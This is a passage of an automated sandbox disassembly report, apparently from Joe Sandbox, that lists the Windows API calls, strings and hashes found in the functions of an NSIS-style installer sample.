                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                    APIs
                                                    • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                    • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                    • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                    • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                    • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                    • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                    • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                    • String ID: $ @$M$N
                                                    • API String ID: 1638840714-3479655940
                                                    • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                    • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                    • String ID: 82D$@%F$@rD$A
                                                    • API String ID: 3347642858-1086125096
                                                    • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                    • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                    • API String ID: 1916479912-1189179171
                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                    APIs
                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                    • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                    • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                    Strings
                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                    • \*.*, xrefs: 00406D03
                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                    • API String ID: 2035342205-3294556389
                                                    • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                    • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                    APIs
                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                    • API String ID: 3581403547-784952888
                                                    • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                    • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                    APIs
                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                    Strings
                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CreateInstance
                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                    • API String ID: 542301482-1377821865
                                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID:
                                                    • API String ID: 1974802433-0
                                                    • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                    • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                    • API String ID: 20674999-2124804629
                                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                    APIs
                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                    • SendMessageW.USER32(00000000), ref: 00404251
                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                    • SetCursor.USER32(00000000), ref: 004042D2
